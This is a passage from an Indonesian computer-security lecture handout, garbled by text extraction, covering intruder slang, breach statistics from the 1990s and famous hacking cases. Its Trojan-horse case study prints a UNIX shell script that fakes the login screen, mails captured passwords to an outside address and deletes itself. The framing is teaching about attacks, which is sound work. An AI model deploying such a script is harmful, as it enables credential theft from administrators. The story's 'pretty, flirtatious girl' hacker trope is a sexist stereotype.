• Tidak ada hasil yang ditemukan

The Competition (Si Pesaing) - tipe penyusup ini ter tar ik pada data yang anda miliki dalam sistem anda. Ia

Dalam dokumen Keamanan Komputer 1 (Halaman 26-44)

mungkin seseorang yang beranggapan bahwa anda memiliki sesuatu yang dapat menguntungkannya secara keuangan atau sebaliknya

Is tilah bagi pe nyus up

M undane

; tahu mengenai hacking tapi tidak

mengetahui metode dan prosesnya.

lamer (script kiddies)

; mencoba scr ipt2 yang per nah di buat oleh aktivis hacking, tapi tidak paham bagaimana cara membuatnya.

wannabe

; paham sedikit metode hacking, dan sudah mulai berhasil menerobos sehingga berfalsafah ; HACK IS MY RELIGION.

larva (newbie)

; hacker pemula, teknik hacking mulai dikuasai dengan baik, ser ing bereksper imen.

Is tilah bagi pe nyus up

hacker

; aktivitas hacking sebagai profesi.

wizard

; hacker yang membuat komunitas pembelajaran di antara mereka.

guru

; master of the master hacker, lebih mengarah ke penciptaan tools-tools yang powerfull yang salah satunya dapat menunjang aktivitas hacking, namun lebih jadi tools pemrograman system yang umum.

S e curity Bre ach Accide nt

1996 U.S. Federal Computer Inci dent Response Capabi l i ty

(FedCIRC) melaporkan bahwa lebih dar i 2500 “insiden” di system komputer atau jar ingan komputer yang disebabkan oleh gagalnya sistem keamanan atau adanya usaha untuk membobol sistem keamanan

1996, FBI N ati onal Computer Cri mes Squad, Washington D.C., memperkirakan kejahatan komputer yang terdeteksi kurang dar i 15%, dan hanya 10% dar i angka itu yang dilaporkan

S e curity Bre ach Accide nt

 1996 Inggr is, N CC Informati on Securi ty Breaches Survey

menunjukkan bahwa kejahatan komputer menaik 200% dar i tahun 1995 ke 1996. Ker ugian rata-rata US $30.000 / insiden

1997 Penelitian Del oi tte Touch Tohmatsu menunjukkan bahwa dar i 300 per usahaan di Australia, 37% (dua diantara lima) per nah mengalami masalah keamanan sistem komputer nya

S e curity Bre ach Accide nt

1998 FBI melaporkan bahwa kasus per sidangan yang

berhubungan dengan kejahatan komputer meroket 950% dar i tahun 1996 ke tahun 1997, dengan penangkapan dar i 4 ke 42, dan terbukti (convi cted) di pengadilan naik 88% dar i 16 ke 30 kasus

Contoh Akibat Je bolnya S is te m Ke am anan :

1988, Keamanan sistem mail sendmai l dieksploitasi oleh Rober t Tapan Mor r is sehingga melumpuhkan sistem

Inter net. Kegiatan ini dapat diklasifikasikan sebagai “deni al of servi ce attack”. Diperkirakan biaya yang digunakan untuk memperbaiki dan hal-hal lain yang hilang adalah sekitar

$100 juta. Di tahun 1990 Mor r is dihukum (convicted) dan hanya didenda $10.000

Contoh Akibat Je bolnya S is te m Ke am anan :

10 Maret 1997, Seorang hacker dar i Massachusetts berhasil mematikan sistem telekomunikasi di sebuah air por t local (Worcester, Massachusetts) sehingga mematikan

komunikasi di control tower dan menghalau pesawat yang hendak mendarat. Dia juga mengacaukan sistem telepon di Rutland, Massachusetts.

http:/ / www.news.com/ News/ Item/ Textonly/ 0,25,202 78,00.html?pfv

Contoh Akibat Je bolnya S is te m Ke am anan :

1990, Kevin Poulsen mengambil alih system komputer

telekomunikasi di Los Angeles untuk memenangkan kuis di sebuah radio local

1995, Kevin Mitnick, mencur i 20.000 nomor kar tu kredit,

menyalin system operasi DEC secara illegal dan

mengambil alih hubungan telpon di New York dan Califor nia

1995, Vladimir Levin membobol bank-bank di kawasan

Contoh Akibat Je bolnya S is te m Ke am anan :

2000, Fabian Clone menjebol situs aetna.co.id dan Jakar ta

mail dan membuat directory atas namanya ber isi

per ingatan terhadap administrator situs ter sebut

2000, Beberapa web site Indonesia sudah dijebol dan daftar nya (beser ta contoh halaman yang sudah dijebol) dapat dilihat di koleksi http:/ / www.2600.com

2000, Wenas, membuat ser ver sebuah ISP di singapura down

M e m aham i Hacke r Be ke rja

Secara umum melalui tahapan-tahapan sebagai ber ikut :

Tahap mencar i tahu system komputer sasaran.

Tahap penyusupan

Tahap penjelajahan

Contoh kas us Trojan Hous e , m e m anfaatkan SHELL s cript UNIX

Seorang gadi s canti k dan geni t peser ta kul i ah UN IX di sebuah perguruan ti nggi memi l iki potensi memanci ng pengelol a si stem komputer (admi ni strator pemegang account root . . . hmmm) yang l engah. Ia mel aporkan bahwa komputer tempat i a mel akukan tugas- tugas UN IX yang di berikan ti dak dapat di pergunakan. Sang pengel ol a si stem komputer tentu saj a dengan gagah perkasa i ngi n menunj ukkan kekuasaan sebagai admi ni strator UN IX

" Wel l, i ni soal keci l. Mungki n password kamu ke blokir, bi ar saya perbai ki dari tempat kamu" , uj ar admi ni strator UN IX sombong sambi l duduk di sebel ah gadi s canti k dan geni t peser ta kul i ah tersebut

Keesokan hari nya, terj adi l ah kekacauan di si stem UN IX karena di duga terj adi penyusupan ol eh hacker termasuk j uga hompepage perguruan ti nggi tersebut di -obok- obok, makl um pengel ol anya masi h sama. Sel anj utnya pi hak perguruan ti nggi mengel uarkan press rel ease bahwa homepage mereka di j ebol ol eh hacker dari Luar N egeri . . . . hi hi i i

Contoh kas us Trojan Hous e , m e m anfaatkan SHELL s cript UNIX

Nah sebenarnyaapasih yang terjadi ?

Sederhana, gadiscantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:

# !/ bin/ sh

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

# Nama program : my_login

# Deskripsi :Program kuda trojan sederhana

# versi 1.0 Nopember 1999

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

COUNTER= 0

Cat / etc/ issue

W hile [ " $COUNTER" –ne 2 ]

do

let COUNTER= $COIUNTER+ 1

echo " login: \ c"

read LOGIN

stty echo

echo " password: \ c"

read PASSW ORD

echo " User $LOGIN : $PASSW ORD" | mail gadis@company.com

stty echo

echo

echo " Login Incorrect"

done

rm $0

Contoh kas us Trojan Hous e , m e m anfaatkan SHELL s cript UNIX

Apabila program ini dijalankan maka akan ditampilkan layar login seper ti layaknya awal penggunaan komputer pdaa sistem UNIX:

Login:

Password:

Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak

melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya

Contoh kas us Trojan Hous e , m e m anfaatkan SHELL s cript UNIX

Seper ti pada program login sesungguhnya, sistem komputer akan meminta

pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan

Login:root

Password: * * * * * * * *

Login Incorrect

Tentu sajaAdministrator UNIX akan kaget bahwa passwordnya ter nyata

(seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan

Contoh kas us Trojan Hous e , m e m anfaatkan SHELL s cript UNIX

Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ter nyata seorang hacker !!

Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu

r m $0

Contoh kas us Trojan Hous e , m e m anfaatkan SHELL s cript UNIX

yang ar tinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peser ta kuliahnya.

Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini

Daftar Pus taka

http:/ / id.wikipedia.org/ wiki/ Keamanan_komputer

www.cer t.org

Dalam dokumen Keamanan Komputer 1 (Halaman 26-44)

Dokumen terkait